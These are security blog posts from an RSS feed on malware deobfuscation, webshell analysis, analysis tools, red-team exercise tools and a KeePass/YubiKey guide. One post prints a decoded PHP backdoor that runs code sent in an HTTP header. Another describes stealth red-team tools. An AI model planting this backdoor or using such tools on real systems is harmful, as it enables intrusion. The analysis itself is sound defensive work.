Kahu Security http://www.kahusecurity.com Wed, 18 Nov 2015 01:05:53 +0000 en-US hourly 1 Text Decoder Toolkit http://www.kahusecurity.com/2015/text-decoder-toolkit/ http://www.kahusecurity.com/2015/text-decoder-toolkit/#comments Wed, 18 Nov 2015 01:05:53 +0000 http://www.kahusecurity.com/?p=13470 Here’s a challenge for you, what does this decode to?

T{4 G=C 9<=E B63 3<3;G /<2 9<=E G=C@A3:4^ G=C <332 <=B 43/@ B63 @3AC:B =4 / 6C<2@32 0/BB:3A` {4 G=C 9<=E G=C@A3:4 0CB <=B B63 3<3;G^ 4=@ 3D3@G D71B=@G 5/7<32 G=C E7:: /:A= AC443@ / 2343/B` {4 G=C 9<=E <37B63@ B63 3<3;G <=@ G=C@A3:4^ G=C E7:: AC11C;0 7< 3D3@G 0/BB:3`T _ !C< "HC^ "63 s@B =4 %/@

I was asked by a couple of folks to help them decode this (this isn't the exact string but it's similar). This was from a CTF and they couldn't figure it out. The challenge already ended so they just wanted to learn how to tackle stuff like this in the future. Unlike the real world, there is often an accompanying script or program that decodes this. You hardly encounter an encoded string and then asked to figure it out cold.

CTF pros could probably do this faster than 10 minutes but that's how long it took me with Calculator and Notepad. I should have used a spreadsheet. After I was done, I thought I would write a program for myself to see if I can decode strings like this much faster.

So how do you even start decoding this? I came up with three methods but I'm sure there are other, better ways.

Method #1 - Character Frequency
Click on the "Statistics" tab then click on the "Get Stats" button. This will count the number of times each letter appears in the script. You see that 3 and = are the most common characters (besides the space).


Using this as a guide we know that the most common English letters are E T A O I N S H R . Let's see what the difference is between 3 and e. Enter those values in the "Difference" section and click on the "Calculate Difference" button. I get "50".


Now click on the "Decoder" tab, enter the value "50", choose "Character Shift" then click on "Decode". Looks like we partially decoded it.


Method #2 - Enumeration
The second method dumps a text file that enumerates through all of the possible values. Choose the "Enumerate to File" action and the "Character Shift" operator.


Examine the resulting file and look for clues. I searched for "the" and found multiple hits but the one at line #50 looks promising. The line #50 means that the character shift value of 50 was used.


At this point you can go to the Decoder tab and do a character shift with a value of 50 like we did above.

Method #3 - Distance Calculator
The number of characters between two letters will be the same as long as the XOR or character shift value remains constant.

For example,
The character distance between the letters h-e-l-l-o is -3, 7, 0, and 3 (i.e. the difference between h and e is -3, between e and l is 7, and so on). If we shifted "hello" with a value of 10, the resulting string is "rovvy" and the distance between r-o-v-v-y is still -3, 7, 0, and 3.

On the "Statistics" tab, you can search for "the" or any other word that has three or more characters and the toolkit will try to find the same character distance in the input string.


Custom Substitution Table
The three different methods revealed the character shift value of 50 as our starting point but we still have some undecoded text to contend with.


In the output box, it looks like the third character is "f" so the preceeding character might be "I" as in "If". There's two other instances so it looks probable but let's test this theory out.

Going back to the "Statistics" tab, I highlight a character that should be an "I" then click on "Get Highlighted Char". The program will extract the corresponding characters from both the input and output boxes.

In this example, I think that the left curly brace should be a capital "I" so I make that change then click on the "Calculate Difference" button. I get "-50".


So it looks like we have two different character shift values. How would I decode using two values? I need to remap characters and I also need to display the ASCII table so I can visually determine what to map. The "Custom Substitution Table" is what I came up with.

If you enter a value on the header row, the values will be copied down the column. If you need to enter a value for a specific character, just enter it into the appropriate box. In this example, the space character in the input string was being shifted to "R". I want to leave this alone so I enter "0" in the "032 - SPC" box.


You can download the program here. If this program is used outside of CTFs, I would really like to know.

http://www.kahusecurity.com/2015/text-decoder-toolkit/feed/ 0
Deobfuscating Magento Guruincsite Javascript http://www.kahusecurity.com/2015/deobfuscating-magento-guruincsite-javascript/ http://www.kahusecurity.com/2015/deobfuscating-magento-guruincsite-javascript/#comments Thu, 22 Oct 2015 04:55:57 +0000 http://www.kahusecurity.com/?p=13459 Continue reading ]]> I saw this blog post by the super talented guys over at Sucuri and thought that it was just another URL redirection script hiding behind escaped characters but it turned out to be better than that.

Here’s what the script looks like in its original form:


When you unescape it, it looks like this. Notice that there’s two sections. The self-executing function at the top and another at the bottom. The function at the top deobfuscates the blob of characters in the middle and makes an array out of it. The bottom function takes values from a resulting array to redirect the user to the drive-by site.


In the screenshot above I put an arrow where the main deobfuscation takes place. It reads in the blob of characters, two at a time, and does a base30 decode then subtracts a value from an array. The array is made up of four characters which is the length of the script itself, 1,867 characters. The algorithm subtracts the ASCII representation of those four numbers.

What this means is that if you change anything in the script, the script will break and won’t properly decode the blob.

Let’s deobfuscate this script dynamically and statically.

There are several ways to deob this dynamically but here’s the most straightforward and easiest I think. In this screenshot I add an “alert(LCWEHH);” so I can see the result of the deobfuscation.


When I run it, I get garbage because I modified the length of the script.


Let me try this again. Since the deobfuscation routine is based on the length of the script I need to subtract what I’m adding in. So “alert(LCWEHH);” is 14 characters.


I need to find a place in the script, after it’s done with the deobfuscation, where I can subtract 14 characters to keep the length the same. Here’s something I can replace (highlighted in red). I can remove the “(LCWEHH[2-4+1+3])” without causing an error.


If you notice this string is 17 characters so I need to add 3 characters back to the script. So I just pad my alert call with three spaces. Here’s the final script:


When I run it, I get the deobfuscated results:


Now I can build the redirection function using the values from this array so it looks like this:


Now let’s do the same thing statically. For this I’ll use Converter.

Fire it up and paste in the blob of characters from the middle of the script.


Click on Tools > Convert Base


Make the following selections then click on Convert. I click on “Send Data to Main Form” to send the result to the main screen.


I need to change this to comma delimited so I just click on Search/Replace Text and replace spaces with commas.


Next, I click on the “Copy Output to Input” button then on Tools > Key Search/Convert.


Finally I make these selections and click on Convert.


What I did was use Converter’s built-in expression engine which takes the decimal val(ue), subtract the previous res(ult) then subtract the ASCII value of the first digit of the script’s length which is 49 (remember the total length of the script is 1,867). I add a comma then repeat the expression using the second digit of the script’s length which is 56 and so on. Since I selected the Consecutive action, it will loop through these four expressions across the entire decimal value input.

So basically, Converter is doing this calculation for me:

164 – 49 – 0 = 115 = s
270 – 56 – 115 = 99 = c
267 – 54 – 99 = 114 = r
274 – 55 – 114 = 105 = i

Now I can replace the original Javascript with the values from the above results to see how it does the redirection.

By the way, if you need help with the expression engine, click on Extras > Expressions Help


Happy deobfuscating!

http://www.kahusecurity.com/2015/deobfuscating-magento-guruincsite-javascript/feed/ 0
Javascript Deobfuscator Updated http://www.kahusecurity.com/2015/javascript-deobfuscator-updated/ http://www.kahusecurity.com/2015/javascript-deobfuscator-updated/#comments Wed, 21 Oct 2015 01:58:32 +0000 http://www.kahusecurity.com/?p=13441 Continue reading ]]> Just a quick update…I added a Javascript beautification feature. Just click on the “Beautify” button and the results will appear at the bottom.


I did get some people emailing me saying that they got an error message. I compiled this to .NET Framework 4.5 so make sure you have this installed. I tested this version on 32-bit and 64-bit and it works for me.

The new version is available on the Tools page.

http://www.kahusecurity.com/2015/javascript-deobfuscator-updated/feed/ 0
New Javascript Deobfuscator Tool http://www.kahusecurity.com/2015/new-javascript-deobfuscator-tool/ http://www.kahusecurity.com/2015/new-javascript-deobfuscator-tool/#comments Sat, 17 Oct 2015 03:36:01 +0000 http://www.kahusecurity.com/?p=13440 Continue reading ]]> This particular spam page redirect was brought to my attention by a colleague because it was getting past the web filters using Javascript obfuscation. In one version, the landing page uses a meta refresh tag. I guess it was getting caught too easily so they upped their game and are now using several layers of Javascript obfuscation.

It starts off with spammy emails with links that look like this:

hxxp://panacheve .com/interest.php?w2n4
hxxp://compareukshops.azurewebsites .net/justice.php?p8hw2

These sites send you to a redirector:

hxxp://it8vn4 .net/?a=353900&c=wl_con&s=doptilazer
hxxp://com-afp .net/?a=362298&c=wl_con

Which in turn redirects you to a spam page which uses a variety of subdomains:

hxxp://136-healthandbeauty.it8vn4 .net/
hxxp://518-healthandbeauty.4pxp0 .net/
hxxp://281-weightloss.gt9dg7 .net/
hxxp://341-weightloss.orelr3 .net/
hxxp://807-weightloss.gt9dg7 .net/
hxxp://948-diet.z3jdra .net/
hxxp://999-diet.z3jdra .net/
hxxp://442-fitness.4pxpo0 .net/

Here’s what the spam pages look like:


If you strip away the URL parameters and visit the site, you should see something like this.


The Javascript base64-decodes a string that’s been reversed. You can see that there’s an eval at the end which executes the result. Before I introduce a new tool, let me show you how to quickly deobfuscate this with Revelo via two methods. With the first method, paste in the script, choose “Redirect Eval to Action”, then click on “Execute”.


Click on the “Results” tab to get the results.


Copy that script and paste it on the main tab. Revelo needs to see the <script></script> tags so make sure it’s there. We can see that the script is packed with eval at the beginning but since this script is packed multiple times, you will notice it has “eval” near the end of the script too. We need to tell Revelo to catch the “eval” at the beginning so click on Options > Replace Starting at Top. Leave the deobfuscation method as-is then click on “Execute” again.


Click on the “Results” tab to get the results. You need to do this a couple more times before you end up with this. You will see the script now using “document.write” so choose “Redirect Do.Write to Action”.


Finally, we get to the deobfuscated script.


If you just want to get to the final redirect URL without going through the above steps then you can select either “Capture HTTP Request via Proxy” or “Capture HTTP Request via IE”. This is the second method.


With either option, Revelo will execute the script and block the HTTP request to the website then show you where it was going to go. This keeps your computer safe but you should always run Revelo in a VM just in case these scripts use exploits or call another app to make the HTTP request.



Introducing Javascript Deobfuscator
I’ve been spending the past several months porting my tools over to .NET. I apparently have written dozens of programs over the years so there’s still a whole bunch more to do. I started to think about Revelo and wondered if I should start from scratch and redesign it to make it easier to use. As a proof of concept, I came up with this tool.

It’s very basic and can probably only handle simple Javascript obfuscation but it might be a good standalone tool for quick and easy deobfuscation.


Let me run it through the above script to show you how this program works. Paste the Javascript code into the input field without any HTML tags. You must also remove the <script></script> tags. Simply identify the verb you want to have the tool deobfuscate. Here, I just select the word “eval”.


I click on “Convert” and the deobfuscated result appears. This is the second layer of obfuscation just as we saw above with Revelo.


I click on the “Copy Output to Input” button so I can work on the resulting script. Once again, I select the word “eval” at the beginning and click on “Convert” again. I do this three more times until I get this. Now I highlight the verb “document.write”. When highlighting the verb make sure you don’t include any stray characters like a parenthesis, comma, etc. You will probably end up with no results.


And I get the final deobfuscated results!


I tried to make it as easy as “Select-Click-Deobfuscate”. In some ways this might be better to use than Revelo since you can specify exactly which verb to target. You can use this to deobfuscate function calls, variables, and other verbs but I haven’t fully tested it yet. I can tell you that this program can’t do DOM so it will be limited compared to Revelo.

A word of caution if you use this tool! There are no safeguards built into this program so if you mess up on a script that has an exploit or shellcode in it, your computer could get hosed. Do this in a virtual machine, preferably without anti-virus running or it will incorrectly flag this tool as being malicious just like Revelo.

You can get Javascript Deobfuscator from the Tools page.

http://www.kahusecurity.com/2015/new-javascript-deobfuscator-tool/feed/ 0
Cyber Exercise Tools http://www.kahusecurity.com/2015/cyber-exercise-tools/ http://www.kahusecurity.com/2015/cyber-exercise-tools/#comments Sat, 03 Oct 2015 18:54:38 +0000 http://www.kahusecurity.com/?p=13424 Continue reading ]]> For the past two years, I’ve been involved with several cyber exercises and competitions from planning, training, as well as participating in them. I’ve written a dozen or so defensive and offensive tools for these cyber ranges. While there’s better tools out there that do the same thing, I wanted to customize my own for the 64-bit environment and battle-test them to work out any bugs. Rules for some of these exercises and competitions state that any tool can be used as long as it’s publicly available so that’s why I’m posting some of the tools here.

Welcome Mat
This is a program for the blue team. It will try to listen on unused ports from 1 through 1024 where possible. The idea is to make it hard for the red team to figure out which services your server is running.

Here’s what the tool looks like. You can only listen to up to 1024 ports at a time.


When the red team does an nmap scan, here’s what it looks like:


Experienced red teamers should be able to figure out which ports are truly open.

Cover Fire
During these exercises, it’s hard to be slow and quiet since the blue team knows you’re coming. You can do some misdirection here or launch a decoy there but it’s hard to hide. This is a program for the red team. This will perform a series of random GETs and POSTs to specific webpages with a variety of user-agents. This should fill up the web server logs and make it challenging for the opposing side to figure out where your webshells are.

The program takes in a text file of hosts/IPs. The other text file it needs is the URLs to request. Sample files are included. You will need to spider your target website first and generate a list of URLs yourself.


Here’s what the server logs look like when the tool is running. Can you find the webshell?


Blue team members who know their stuff should be able to find the webshell no matter if the logs contain a lot of noise.

Fake Defender Alert
This program attempts to fool the blue team member into granting it admin privileges. It uses the same privilege escalation trick implemented by Beta Bot. I added a screen-dimming feature to make it more convincing.


I started off writing a portknocker program that sniffs network traffic to look for a keyword then open up a reverse or bindshell port but I found a better way to achieve the same goal. This program watches various ingress points on the server and executes commands it receives. This is done without using any listening port so monitoring netstat is useless.

Backdoor Shell Menu
I wrote a reverse shell and during the exercises, I found myself doing the same commands over and over again. In order to be faster, I built capabilities directly into the shell program itself. Here’s a screenshot of what the menu looks like. Instead of typing a series of commands manually, I just type the menu number plus some required parameters and I’m done.


Netstat Interceptor
This program intercepts calls to netstat and can modify or remove anything related to the IP address, port, or PID of my choice. I can do the same thing to tasklist and taskkill.


Capture-The-Flag Jr.
Since I’ve been involved with cyber exercises lately, I thought I would help teach students about cyber security so I started working on a capture the flag for kids. It’s going to be pretty basic but the idea is to introduce them to various security concepts and get them familiar with security tools like a packet sniffer, hex editor, and Linux commands. It’s going to be self-contained and portable so an instructor can run it in class and pass it to the kids to work on it at home.


For the time being, you can get the first two programs from the Tools page.

http://www.kahusecurity.com/2015/cyber-exercise-tools/feed/ 0
Webshell with a Booby Trap http://www.kahusecurity.com/2015/webshell-with-booby-trap/ http://www.kahusecurity.com/2015/webshell-with-booby-trap/#comments Sat, 25 Jul 2015 02:39:07 +0000 http://www.kahusecurity.com/?p=13412 Continue reading ]]> I came across three interesting PHP scripts that were presumably dropped by the same attacker. Perhaps this is old news but it’s something new to me.

Here’s the first one which looks innocent enough.


However, if you put in the wrong password, you can end up at a malicious or phishing page.



Inspecting the traffic shows that the password you tried gets captured.


Here’s what the panel looks like:


This is the second script which looks like it failed to do anything:


Nope, the script works just fine. It dropped a webshell in the folder.


If you look closely, you can see that the initial file resembles a JPEG file. The file does open up as a normal graphic but embedded in it are scripts that can execute PHP, ASP, and JSP commands as well as drop a PHP webshell.


The third script looks like this when you open it in the browser. It’s a seemingly benign page from the PHP Documentation website.


However, if you append a certain value to the URL, a hidden feature is enabled at the bottom of the page and you can now upload any file of your choice.


Ah, more things to be on the lookout for…

http://www.kahusecurity.com/2015/webshell-with-booby-trap/feed/ 0
Converter Updated http://www.kahusecurity.com/2015/converted-updated/ http://www.kahusecurity.com/2015/converted-updated/#comments Sun, 21 Jun 2015 02:52:10 +0000 http://www.kahusecurity.com/?p=13395 Continue reading ]]> The latest version includes several new features which I’d like to highlight here:

Enhanced Range Search/Replace
The feature can be found by going to this menu item under Tools:


You can now add incrementers as a text replacement as seen in this graphic. Just add ^i if you want to start with 0 or ^I if you want to start with 1. If you check the “Keep Enclosed Contents” box, the “from” and “to” values will be included in the results (inclusive).


The other option is called “Keep Value From String… and To String…” which just keeps the in-between values.


New Hashing Algorithms
Added new hashing algorithms (credit: Karim Wafi) under the stats menu:


Convert Mixed Format
I moved the mixed format options from under the Format menu to its own form under the Tools menu. I included examples so you can understand what it’s used for.


I also added a “Mixed Entities to Hex” feature. There’s a button on the main screen called “Decode HTML” to decode HTML entities but if your input string has a mixture of HTML entities and other text, it fails. This feature will convert your input to hex then you can convert it back to text to get your results.


Microsoft Script Decoder
Microsoft Script Encoded strings are now being seen in the wild. I added a script encoder and decoder function in two places (credit: Jean-Luc Antoine and Shawn Stugart).

If you have a large file to convert, you can use the Convert Script File option by going here:


This is the form which allows you to choose an input file, output file, and option.


Your input file you wish to decode needs to contain only the script which starts with #@~^… and ends with ^#~@.


If you have a short string to decode then you can use the Script Encoder/Decoder feature which is located under the Tools menu.


Just paste in the script and make sure it contains the starting and ending key values.


Deobfuscating “Sundown EK”
Now let’s use some of the features to deobfuscate “Sundown’s” landing pages. Here’s a look at exploit chain in Fiddler (credit: Kafeine):


The first file is the landing page which looks like this:


Paste that into Converter, choose Tools > Convert Mixed Format, click on the Mixed Entities to Hex option and click on Convert. To makes things a bit easier, choose the “Percent” output format at the bottom. (This saves you from having to do a Format > Hex Format – % in the next step.)


Click on the “Copy Output to Input” button then click on the “Hex to Text” button. Almost done…you can see some hex values in there.


So click on the “Copy Output to Input” button then click on the “Unescape” button. Now we’re done.


Back to Fiddler…I chose the 10th item called “street4.php.htm”. Here’s what that looks like:


There’s three scripts on this page. Two are encoded as “JScript.Encode” and the third as “VBScript.Encode”, however, it’s the same encoder. I did the first one above so let me do the second.


Click on “Send Data to Main” then click on the “Unescape” button.


For the third script, let me paste that into its own file.


I make my selections and click Convert.


And we’re done!


Here are the other changes/fixes that were made to Converter:

  • Update the Beautify JS and HTML function (credit: jsbeautifier.org)
  • Correctly rotate non-CSV hex values and the text values in the Key Search/Convert feature
  • Clear the output text box when the Import Binary File function starts
  • Update the results when the space and colon delimiter options is used in conjunction with Format > Hex function
  • Add new input delimiter to Convert Base feature
  • Include last value when doing Octal to Hex function
  • Add new options colon, space and unicode to Format > Hex Format feature

You can download Converter here. Thank you for your support!

http://www.kahusecurity.com/2015/converted-updated/feed/ 0
Malicious Word Macro Caught Using Sneaky Trick http://www.kahusecurity.com/2015/malicious-word-macro-caught-using-sneaky-trick/ http://www.kahusecurity.com/2015/malicious-word-macro-caught-using-sneaky-trick/#comments Sat, 07 Mar 2015 04:24:20 +0000 http://www.kahusecurity.com/?p=13368 Continue reading ]]> There has been a slew of malicious Word documents attached to email purporting to be invoices, receipts, etc. This particular one caught my eye but I’m not sure if this is an old trick. I just haven’t seen this method used before and thought it was quite clever.

Here’s the email that had a zipped file attached. The zipped file contained a Word document. The email in poor English says, “Thank you for payment. Your invoice…is attached. Thank you for your business – we appreciate it very much.”


Opening the Word document, first thing you’ll notice is the security warning and below it a bunch of garbled text. A message above it says, “If you document have incorrect encoding – enable macro.”


Clicking on the “Enable Content” button then reveals the invoice, making this (slightly) more believable and possibly enough to convince the unsuspecting recipient.


Using OfficeMalScanner, the macros, specifically the one called “ThisDocument” can be dumped to a file for analysis.


Let’s try it with OleDump. It nicely shows the objects inside of the document.


We can also dump the ‘ThisDocument’ object.


Looking at the macro, we can see a bunch of string concatenation going on and typical garbage in between legitimate VBA code.


A quarter ways in, there’s some URLs to take note of.


Basically the VBA macro builds a VBS script and writes it out.


Interestingly, this VBS calls up a Powershell file. How vogue. It’s now very clear what it’s doing — downloading and executing a file from Internet then downloading an image for statistics and cleaning up.


Let me download the file…


And see what VirusTotal has to say…


Regarding that image download, here’s what it is:


The image’s download stats are in that red box. Not sure how many are victims vs security folks but that could be an impressive number.


Going back to the macro, I wanted to find out how it “decrypted” the gibberish into text. Near the bottom, I see reference to “findText” and “secondText” followed by some clean-up code.


The findText subroutine shows that it looks for content between “<select></select>” tags then deletes it.


The secondText routine looks for “<inbox></inbox>” tags and changes the contents’ font color to black.


Ah! It’s not doing any decryption, it’s just some clever sleight of hand. The invoice text was there all along, hidden with white text. Here you can see the hidden content in green.


Sneaky indeed.

http://www.kahusecurity.com/2015/malicious-word-macro-caught-using-sneaky-trick/feed/ 0
Deobfuscating a Wicked-Looking Script http://www.kahusecurity.com/2015/deobfuscating-a-wicked-looking-script/ http://www.kahusecurity.com/2015/deobfuscating-a-wicked-looking-script/#comments Wed, 04 Mar 2015 05:05:30 +0000 http://www.kahusecurity.com/?p=13336 Continue reading ]]> Bart Blaze, one of my security researcher friends passed along this PHP script to me. Let’s have a look.


It looks like PHP ate some Perl and barfed it out. First thing I asked myself is, “does this even run?” It looks like a mess but it actually runs just fine. This script makes clever use of bitwise operators. For example…

$YzuZ=n ^ ‘)’; // this equates to ‘G’

To make this readable, I split everything by semi-colon (except when it’s between quotes). One gotcha is that this script embeds comments (# and /* */) so you have to look very closely and either leave it alone…


Or fix it up…


After I cleaned it up, I noticed that the script boils down to the last two lines. So I just echo out each of the important variables:


When the script is executed, I get the following values:


Now I just replace the variable names with the corresponding values to get the final result. This creates a function with a value passed via the header (probably includes ‘preg_replace’) which turns this into a well-hidden backdoor.

if(md5(getenv(HTTP_A)) == 5d15db53a91790e913dc4e05a1319c42) $bIywY=create_function(‘$a, $b, $c’, getenv(HTTP_X_UP_CALLING_LINE_ID));
$bIywY(x1o6Vm2, WFrkAj9, QcFS0u);

Be sure you check out Bart’s blog to learn more about this particular script.

http://www.kahusecurity.com/2015/deobfuscating-a-wicked-looking-script/feed/ 0
Revelo Updated http://www.kahusecurity.com/2015/revelo-updated-2/ http://www.kahusecurity.com/2015/revelo-updated-2/#comments Mon, 16 Feb 2015 02:57:39 +0000 http://www.kahusecurity.com/?p=13329 Continue reading ]]> A colleague of mine received the following email in their Gmail in-box and wondered how it got past their filters and what it does.


What almost tricked him was the fact that it called out his name. Only after looking at the originating email address did it make him pause. Good thing they didn’t spoof that. Let’s have a look at the attachment.


It’s a Javascript file. Malicious scripts are hard to detect because it’s so easy to modify and customize. By the looks of this, it concatenates a value to the variable ‘a’ then jumps to another function. It keeps doing this until the very end then evals it. The problem is trying to find the “end”. Can you find it?


First let’s deobfuscate this manually. You will need to find the end of all of the concatenation it’s doing then replace the eval with alert. After spending about a minute of eyeballing the script, I gave up. I did a search for “(a)” and found in the middle.


Just change that to “alert(a)” and execute the file with your browser and you’ll see what it does.


An easier way is just to append the short script at the end like this. When you run the script, you get the same result as above.


The deobfuscated script, by the way, makes an AJAX call to a website at tripenjoy.com, downloads a unique file which poses as a JPEG image, renames it as an executable, then runs it.


The downloaded file is definitely not a JPEG image.


The payload keeps changing and the latest one I got was a nearly FUD malware according to VirusTotal.


I’ve been meaning to update Revelo and this script prompted me to do it. The latest version allows you to deobfuscate these types of scripts quicker now by doing the same method we used above.

Run Revelo and paste in the Javascript (or open the file). Revelo needs the “<script></script>” tags so just click on Options > Add Script Tags and it will do so automatically.


Choose the “Append Variable to End” method, type in “a” (the name of the variable we want to view) and click on Execute. Done!


The second method I added is called “Intercept Return and Variable”. What this will do is intercept a user-specified variable that’s being returned from a function back to the caller.

Here’s an example. The script below passes a series of numbers to “CRYPT.obfuscate” then onto a “CRYPT.decode” function. The decode function decodes the values, converts it to a string then returns the deobfuscated result which has been highlighted in red.


All you need to do is select the new method and enter “return output” and click on Execute. Done!


I also added three more options to the menu:


    * “Send Results to Prompt when Possible” – will try to display the results in this way: prompt(1,variable).
    * “Use Double Quote” – when trying various methods to deobfuscate a script, inserting single quotes into the script may mess things up so if this option is selected, double quotes will be used instead.
    * “Convert Object to Text” – simply appends “.text” to objects in order to convert them to text where appropriate.

The latest version of Revelo is available on the Tools page.

http://www.kahusecurity.com/2015/revelo-updated-2/feed/ 0
Wild Wild West – 12/2014 http://www.kahusecurity.com/2014/wild-wild-west-122014/ http://www.kahusecurity.com/2014/wild-wild-west-122014/#comments Sun, 14 Dec 2014 01:16:33 +0000 http://www.kahusecurity.com/?p=13309 Added the following packs:

Null Hole
“Hanjuan EK”
“Archie EK”
“Astrum EK”
“SPL2 Pack”

Special thanks to Kafeine for his valuable input.


http://www.kahusecurity.com/2014/wild-wild-west-122014/feed/ 0
Registry Dumper – Find and Dump Hidden Registry Keys http://www.kahusecurity.com/2014/registry-dumper-find-and-dump-hidden-registry-keys/ http://www.kahusecurity.com/2014/registry-dumper-find-and-dump-hidden-registry-keys/#comments Sun, 07 Dec 2014 02:28:35 +0000 http://www.kahusecurity.com/?p=13303 Continue reading ]]> The cybercriminals behind Poweliks implemented two clever techniques in their malware. The first was leveraging rundll32.dll to execute Javascript and the second was using a method to hide/protect their registry keys. I’ll be focusing on the second method.

The technique of hiding/protecting registry keys using a non-ASCII character goes all the way back to over a decade ago. It’s remarkable in a sense that after all these years, it still works on the latest Windows platform.

Here we see the built-in Windows Registry Editor choke on the hidden/protected key after infecting the computer with Poweliks.


Clicking past the error dialog, you should see something like this. This default key is exposed and fully downloadable/viewable. However, there’s another key that contains the “trigger” that’s not visible.


If we need to research what this particular malware is doing, we ought to find out what else is hiding there. For that we need to find a tool to help us view these hidden registry keys.

With online registry viewers/editors, you can get mixed results. Some seem to work well but lack some basic functionality like exporting keys as text. Others get confused and display the wrong key.




Offline registry viewers/editors fare much better and offer consistent results. However, you will need to log into a separate account on the computer and use this tool. Or you have to copy the registry off of the infected machine and view it on a computer with the tool installed.


I prefer to do an initial triage on the live machine and get to the data as quickly as possible. Since I couldn’t find a portable, online tool that had the features I wanted, I figure I would try my hand at creating one. The tool is called Registry Dumper and uses a DLL which interacts with the registry via NT native APIs that was written by Hoang Khanh Nguyen.


This tool allows you to scan for null characters in a given path. It will iterate through the path to find all the keys with nulls in them.


If you click on the “Show in Hex” checkbox, you can see the key names in hex. Here you will notice that the second entry’s name is “010001” which is equivalent to 0x01 0x00 0x01. This is impossible to view, edit, or delete using the Windows’ Registry Editor.


From here you can copy/paste the path over to the left side and dump the keys to a text file.


Here’s the text file containing all the key values in the given path.


With this tool you can create hidden keys for testing purposes. And if you wanted to delete that impossible-to-remove key, you can use this tool by entering “[x01][null][x01]” as the key name.


The obfuscated data you see there is the result of running it through Microsoft Script Encoder. To deobfuscate it, you can use an online decoder or download a VBS decoder. A fellow by the name of Lewis E. Moten III wrote a decoder program. I repackaged his function in the following tool.


Here is the decoded version. You will notice that I didn’t have to strip away everything else but the encoded string. The decoder program will look for the start and end markers of the encoded text and replace it with the decoded result.


Just recently, a newer variant of Poweliks was found. It uses a different registry hiding technique based on user permissions. You can read about it here.

If you use this tool to access one of these keys, you will get an error message saying that the key doesn’t exist. It does exist but it’s just that it doesn’t have the rights to view it.


Here’s the permission properties of the key using the Windows Registry Editor. Notice that the current user has no read permissions.


You can still use this tool to dump the keys but you first need to grant permission to the user account that’s running the tool. Just click on the Set Permission to User button and the permission is changed to allow the current user the rights.


Now you can access the key:


Here is the dump of the keys:


And the decoded string:


By the way, that Javascript in the “(Default)” key can be deobfuscated easily using Converter. You will see that the value in between the quotes are shifted over by one character (e.g. the word hello = ifmmp). Just enter the value “-1” and click on the SHIFTx button (or you can click once on the minus button on the right).


You can download both tools here.

http://www.kahusecurity.com/2014/registry-dumper-find-and-dump-hidden-registry-keys/feed/ 0
Securing KeePass with a Second Factor http://www.kahusecurity.com/2014/securing-keepass-with-a-second-factor/ http://www.kahusecurity.com/2014/securing-keepass-with-a-second-factor/#comments Thu, 27 Nov 2014 08:02:22 +0000 http://www.kahusecurity.com/?p=13278 Continue reading ]]> Cybercriminals are now stealing password managers so it’s time to make them more secure. You can check out this article for details about how it’s being done.

I wrote this up as a guide to help friends secure their password manager by implementing a second factor. The second factor will come in the form of a USB token that you insert into your computer when you need to run the password manager. If your password manager database and master password gets stolen by Citadel or anything else, criminals won’t be able to open the database without the physical USB token you have in your possession.

Two popular password managers are currently being stolen based on the article above — Password Safe and KeePass. There is a nice walkthrough on Yubico’s website on how to enable YubiKey for Password Safe here. YubiKey can also be used to secure LastPass, Passpack, and others.

Getting YubiKey and KeePass to work was a little tricky so I’ll be describing my experience here.

1. YubiKey made by Yubico

What’s great about the YubiKey hardware is that it supports a number of use cases such as computer logins, disk encryption, and web applications like WordPress, Google, and others. Unfortunately, not all YubiKey hardware supports all applications so be sure you pick up the right YubiKey hardware.

There are basically two types of hardware and the one you want to get to protect KeePass will either be the Standard or Neo version. The FIDO U2F Security Key doesn’t appear to support the protocol we need.

2. YubiKey Personalization Tool

This software program will allow you to configure your YubiKey. We will be configuring the second slot since the first slot is apparently reserved according to Yubico’s website — “Re-programming your YubiKey’s 1st configuration slot will overwrite the YubiCloud configuration, and you cannot undo this action!”

3. KeePass Professional Edition

You may need to install Microsoft .NET Framework 2.0+ if it’s not installed already.

4. KeePass plugin

You have a choice between two different security models — One-Time Pad (OTP) and Challenge-Response. Here are the links to the KeePass plugin that you’ll need:


If you decide on the OTP method, you can follow the instructions on Yubico’s website. It works but I had trouble. I had it generate three sets of OTP values which required three button presses on the YubiKey. Using the YubiKey Neo version, it worked most of the time. With the YubiKey Standard version, it rarely worked for some reason. I think it has something to do with how quickly you can press the button to generate the values. Tinkering with the OtpKeyProv settings (e.g. counters, look-ahead windows) did not yield consistent results but YMMV.

I opted for the Challenge-Response method via KeeChallenge which I’ll be describing here. With KeeChallenge, I didn’t have any problems like I did using the OTP method.

The KeeChallenge plugin can be downloaded directly from here. You will also need to download the latest YubiKey-Personalization release (download both Windows 32- and 64-bit versions) from Yubico. This was the part that I got hung up with but a helpful tip on a discussion board provided the solution.

Setting Up YubiKey
Install and run the YubiKey Personalization Tool then plug in the YubiKey into an available USB port.


Click on the Challenge-Response menu item at the top then click on the HMAC-SHA1 button.


Click on the Configuration Slot 2, ensure user input is required, and the fixed 64-byte input is selected. Click on Generate then on the Write Configuration buttons. You should get feedback that the configuration change was successful.


Make sure you copy and backup the secret key you generated! You will need this to setup KeePass as well as to regain access to your database should YubiKey fail for some reason. Store this in a safe place, preferably printed on paper and definitely not stored on the same computer that you’ll be using KeePass on.

If you want to set up multiple YubiKeys to work with the same KeePass database, just use the same secret key and write the change to the configuration.

That’s it for the YubiKey setup.

Setting Up KeePass and KeeChallenge
Download KeePass as well as the KeeChallenge plugin and Yubico’s YubiKey-Personalization release.

Install KeePass and go to the folder. Copy over the files and folders from the KeeChallenge plugin into the KeePass folder so it looks like this (the items in red belong to KeeChallenge):


Open the folder called “32bit”. See those DLL files? Replace them with the ones from the YubiKey-Personalization files you downloaded (the DLL files are located in the bin folder). Do the same for the 64-bit files.

Start KeePass and create or open an existing database.


Click on File > Change Master Key. Enter a new master password (twice). Click on the “Key File / Provider” checkbox and choose “Yubikey Challenge-Response”. Click on OK.


You will be asked for the secret. Paste the secret key you generated when you configured your YubiKey.


You will then be prompted to plug in your YubiKey if it’s not in already.


Tap the button on your YubiKey when you see this prompt on the screen.


Setup is done!

Usage and Recovery
To use KeyPass going forward, enter the password and ensure the Key File option is checked and set to YubiKey Challenge-Response.


Insert your YubiKey and tap on the button to log in.


You’re in!


If you lose your YubiKey, it broke, or you just can’t log in using it for whatever reason then unplug it, enter your password, and click OK. You will see this prompt. Choose “Recovery Mode”.


Enter the secret key and click OK.


And you’re back in!


You can feel a little more at ease now while shopping online!

http://www.kahusecurity.com/2014/securing-keepass-with-a-second-factor/feed/ 0
